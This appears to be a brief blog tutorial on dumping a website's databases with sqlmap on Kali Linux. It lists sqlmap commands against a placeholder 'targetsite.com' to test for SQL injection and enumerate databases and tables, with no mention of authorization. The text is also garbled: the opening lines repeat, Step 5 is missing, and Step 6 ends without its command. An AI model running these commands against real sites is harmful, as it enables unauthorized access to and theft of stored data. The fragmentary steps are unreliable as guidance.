- Hello everyone this blog is related to database dump using sqlmap.
- Database
dump using Sqlmap
- Hello everyone this blog is related to database dump using sqlmap.
- Database dump using Sqlmap
Step 1: Open Kali Linux
Step 2: Type command to get all functions of ‘Sqlmap’.
# sudo sqlmap -hh
Step 3: Type command to see that the target website contains sql injection vulnerability or not.
# sudo sqlmap -u “targetsite.com”
Step 4: To see the number of database target website has can be done with
# sudo sqlmap -u “targetsite.com”
–dbs
# sudo sqlmap -u “targetsite.com” -D database_name –tables
Step 6: To list content of the particular table use command